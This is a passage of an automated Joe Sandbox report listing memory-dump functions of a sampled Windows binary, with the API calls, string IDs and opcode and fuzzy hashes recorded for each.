                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                • String ID: %s %s$REPLACEFILEDLG
                                                • API String ID: 485132379-439456425
                                                • Opcode ID: b1e83d52a0484c894e0ce3830f4ce9ea67474d5fb5f45732381d6965060a1e53
                                                • Instruction ID: f8b39c06dbf66cbdabf32736dc9d675bca7d5437f6f7957fe5a0311317647ae6
                                                • Opcode Fuzzy Hash: b1e83d52a0484c894e0ce3830f4ce9ea67474d5fb5f45732381d6965060a1e53
                                                • Instruction Fuzzy Hash: 26A1C171A40228AADB25EBA8DC4AFEE7BFDAF15301F0045D5B209B30D1DA705F84CB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 260a48766f1282d404ee942b6efc41935ea825a5ca079fab688e341ffd483229
                                                • Instruction ID: 473ac6eefa6dad875105580d560eb6ff09db3338069b92b7dc7379ce93993dc3
                                                • Opcode Fuzzy Hash: 260a48766f1282d404ee942b6efc41935ea825a5ca079fab688e341ffd483229
                                                • Instruction Fuzzy Hash: 8BC20571E096288FDB35CE289D807EAB7F5EB44305F2545EAD84EE7240E774AE858F40
                                                APIs
                                                • _strlen.LIBCMT ref: 00B0438C
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B04523
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                • String ID: CMT
                                                • API String ID: 2172594012-2756464174
                                                • Opcode ID: 4076f1e691c21044e272afc19b5da5774071b9ffd09ea8d3788a59b6402793d3
                                                • Instruction ID: dcab4d02a7b88dddf4bafdbb44add457c1a86512546a48557619a9625cad6325
                                                • Opcode Fuzzy Hash: 4076f1e691c21044e272afc19b5da5774071b9ffd09ea8d3788a59b6402793d3
                                                • Instruction Fuzzy Hash: 8772BEB1A003448FCB18DF68C8957EA7FE5FF59300F0845ADED5A9B282DB70A945CB61
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B26884
                                                • IsDebuggerPresent.KERNEL32 ref: 00B26950
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B26970
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00B2697A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: f30fd2954cfd93f9d6a6fce12a4e16a532bb1a60c9b4880b84bf6e5ff400c6af
                                                • Instruction ID: 5f6753de2b8649e447022bf7eeeaba6642a7fc5d175b6a202f5e5f8c75203945
                                                • Opcode Fuzzy Hash: f30fd2954cfd93f9d6a6fce12a4e16a532bb1a60c9b4880b84bf6e5ff400c6af
                                                • Instruction Fuzzy Hash: 7F312775D453289BDB21DFA4D989BCCBBF8BF08300F1040EAE40CAB250EB759A849F45
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B0952D,?,00000040,00B0931E,00000001,?,?,?,?,0000001C,00B17618,00B4E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00B09330
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00B0952D,?,00000040,00B0931E,00000001,?,?), ref: 00B09351
                                                • _wcslen.LIBCMT ref: 00B09360
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00B4E0C8,?,?,00B0952D,?,00000040,00B0931E,00000001,?,?,?,?,0000001C), ref: 00B09373
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                • String ID:
                                                • API String ID: 991192900-0
                                                • Opcode ID: 6cc7848897697a4fdc168950013761766ab48c23c6bc9047511d91e08cf7e4aa
                                                • Instruction ID: e6dee70f4da289e17ad18f1f2681459d67f5074d310d9bd9ea00410915bad2c3
                                                • Opcode Fuzzy Hash: 6cc7848897697a4fdc168950013761766ab48c23c6bc9047511d91e08cf7e4aa
                                                • Instruction Fuzzy Hash: 4AF082B5600214FBEB189BA19E05EFF7BBCEB85740B208099F502A71D1CE709E019B78
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00B2535E), ref: 00B2ABBC
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00B2535E), ref: 00B2ABC6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00B2535E), ref: 00B2ABD3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 8bc7eecb3273b7fcc91181d3f049d621de2fa451d373797493452e739828dcd3
                                                • Instruction ID: 84172e7f58e00f14fc01e9a5cd12df74a5305001802485ed22193b595d6d4b27
                                                • Opcode Fuzzy Hash: 8bc7eecb3273b7fcc91181d3f049d621de2fa451d373797493452e739828dcd3
                                                • Instruction Fuzzy Hash: 7931D3749412289BCB21DF68E98879DBBF8FF18310F5041EAE41CA7261EB349F818F45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                • Instruction ID: f76c720eb0097fc0828256e2c92325464615c1aa827e764ef4b5454b212eb69d
                                                • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                • Instruction Fuzzy Hash: 1F022C71E002199FDF14CFA9D8806AEB7F5EF49314F2582AAD919E7384D731AD41CB90
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B1FD6A
                                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B49714,?,?), ref: 00B1FDB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FormatInfoLocaleNumber
                                                • String ID:
                                                • API String ID: 2169056816-0
                                                • Opcode ID: dc425d15b8a05500c785e326069ee4344f28feced60fc8a3857fa18c607a80be
                                                • Instruction ID: 141b33e3be592f735fb8ba44256357a0c610c871728c67e836fd27e26b476ffa
                                                • Opcode Fuzzy Hash: dc425d15b8a05500c785e326069ee4344f28feced60fc8a3857fa18c607a80be
                                                • Instruction Fuzzy Hash: 96113C75260348BADB10DF64DC41BEB77F8EF08701F1044A9A905A72A1EB70AA48C765
                                                APIs
                                                • VirtualQuery.KERNEL32(80000000,00B24D59,0000001C,00B24F4E,00000000,?,?,00000000,00000000,?,?,?,00B24D59,00000004,00B55D84,00B24FDE), ref: 00B24E25
                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,00B24D59,00000004,00B55D84,00B24FDE,?), ref: 00B24E40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: InfoQuerySystemVirtual
                                                • String ID:
                                                • API String ID: 401686933-0
                                                • Opcode ID: b47c95a687f110b1843180afaeb6615142b3e2571ba0abd3f34806683917e5bd
                                                • Instruction ID: c9b23b7ed23a0d5466b8e6aa1123fc53941853e5b583b2478e2a6eb164d1622b
                                                • Opcode Fuzzy Hash: b47c95a687f110b1843180afaeb6615142b3e2571ba0abd3f34806683917e5bd
                                                • Instruction Fuzzy Hash: B101F7326001196BDB18EE69DC05BEE7BE9EFC4328F0DC165ED1DEB255DB38D8018680
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CMT
                                                • API String ID: 0-2756464174
                                                • Opcode ID: 5cb35cb18ccd7f898b01e2cad504efe28d5341608b0b7a9d3c9764a4a83a482e
                                                • Instruction ID: 9750eab54cfaa069e65eb1ddb95534cff081f955a41770500e69712bfabda72d
                                                • Opcode Fuzzy Hash: 5cb35cb18ccd7f898b01e2cad504efe28d5341608b0b7a9d3c9764a4a83a482e
                                                • Instruction Fuzzy Hash: EC629071A006499FDF18DF64C885BEE7FE4EF19300F0841A9ED499B6C2DB70A954CBA1
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B386CD,?,?,00000008,?,?,00B3836D,00000000), ref: 00B388FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3a925692760b1ae9663c97179784598f2eb59c17b8641eb50cfbe66450f885f3
                                                • Instruction ID: 713551d991c51a48d34d82591585d3f0209ecc7198ada58d8e1c7ec3fabbfee0
                                                • Opcode Fuzzy Hash: 3a925692760b1ae9663c97179784598f2eb59c17b8641eb50cfbe66450f885f3
                                                • Instruction Fuzzy Hash: A6B127356106089FD715CF28C48AB647BE1FF45364F798698F899CF2A1CB35E982CB42
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B266AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: 4abe1d43e0cbe06dca924b6ea696fedcff1fdfbf113d01454967bd55ae1e1204
                                                • Instruction ID: fa721fcb7ab241c0f3180c9698a856de1616b737830304dd5005be33b3249dc2
                                                • Opcode Fuzzy Hash: 4abe1d43e0cbe06dca924b6ea696fedcff1fdfbf113d01454967bd55ae1e1204
                                                • Instruction Fuzzy Hash: AC51BCB1D117258FDF19CF58E8857AABBF0FB58314F2484AAC805EB261DB749D00CB50
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00B103ED
                                                  • Part of subcall function 00B10469: __EH_prolog3.LIBCMT ref: 00B10470
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3Version
                                                • String ID:
                                                • API String ID: 2775145068-0
                                                • Opcode ID: 291888e5b4f6f9c7dcced0fabd1a9f744045d6674501eeba899798d1d389d3eb
                                                • Instruction ID: 7623ad9b8fc191a4ff26be5a7e1a1733cef7fe2ef5ff38bd2bc9b6b01c77f4a6
                                                • Opcode Fuzzy Hash: 291888e5b4f6f9c7dcced0fabd1a9f744045d6674501eeba899798d1d389d3eb
                                                • Instruction Fuzzy Hash: C4F081344142489AEB24FF74AC867DD7BF0BB16308F8045A8D66667352DBF455CD8B11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gj
                                                • API String ID: 0-4203073231
                                                • Opcode ID: 8558fd2211eaf79e9046a04d9065ebd1548f46414df52c994b997588d63b2c8f
                                                • Instruction ID: 55fe8e01a0edaeecfb6aec078c1c06bc0364986044f33e797ec85549ad95516e
                                                • Opcode Fuzzy Hash: 8558fd2211eaf79e9046a04d9065ebd1548f46414df52c994b997588d63b2c8f
                                                • Instruction Fuzzy Hash: E4D117B2A083458FC354CF69D88065AFBE1BFC9308F59492EE998E7301D734A955CF86
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00B26445), ref: 00B26A10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 3720316a26be8c261ba492bf94dc6f6fff80d413f1ba331a330bf37ff2a7168c
                                                • Instruction ID: fc7fdc36fc6a6b2c00b8f259b08bdf723e1de8e2f948c39ba9d66e50659daa9c
                                                • Opcode Fuzzy Hash: 3720316a26be8c261ba492bf94dc6f6fff80d413f1ba331a330bf37ff2a7168c
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 95393b93bcd1f043be0510013037890eeb75950476ab101aa929824f5ee191a5
                                                • Instruction ID: 5ee382fdaea433e600e32ac29594127e0fab11923e60e2a8cdb9c6eeac196313
                                                • Opcode Fuzzy Hash: 95393b93bcd1f043be0510013037890eeb75950476ab101aa929824f5ee191a5
                                                • Instruction Fuzzy Hash: A3A00474501701CF57404F755F0530D3FD5FD455D5755415D5405D7175DF354450D701
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                • Instruction ID: 3d3edf3c82b5f65facda7e41f4504eff732d184aa911c0f52eeee81969862fb1
                                                • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                • Instruction Fuzzy Hash: BE8207316047858FCB29CF28C9D0AFABBE1EF95304F54889DD89B8B746D730A985CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 530853b3349b2a3d859e09d526515c3d864e9637257981359b811e9ee2409062
                                                • Instruction ID: 0309e62177873f5d7e43cb90974bd95dc24db384104b30d24d94d717069fd11c
                                                • Opcode Fuzzy Hash: 530853b3349b2a3d859e09d526515c3d864e9637257981359b811e9ee2409062
                                                • Instruction Fuzzy Hash: 28822C69D39F895EE3039A3484021E7E3A86EF71C9F46E71FF8A431526E721A7C75201
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                • Instruction ID: f254cde9565c8c5a2e2d9ec47b77fbd19087337c32cefeadbaf1612859ff3767
                                                • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                • Instruction Fuzzy Hash: 2872E2716483898FCB15CF68C8906E9BFE2FF95304F5885ADD89A8B346D330E985CB51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                • Instruction ID: fc2d98001e61f27a40b2687f223dda2a6243fdb043dc40964355a43063319f32
                                                • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                • Instruction Fuzzy Hash: D8525B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B245D334EA19CB86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
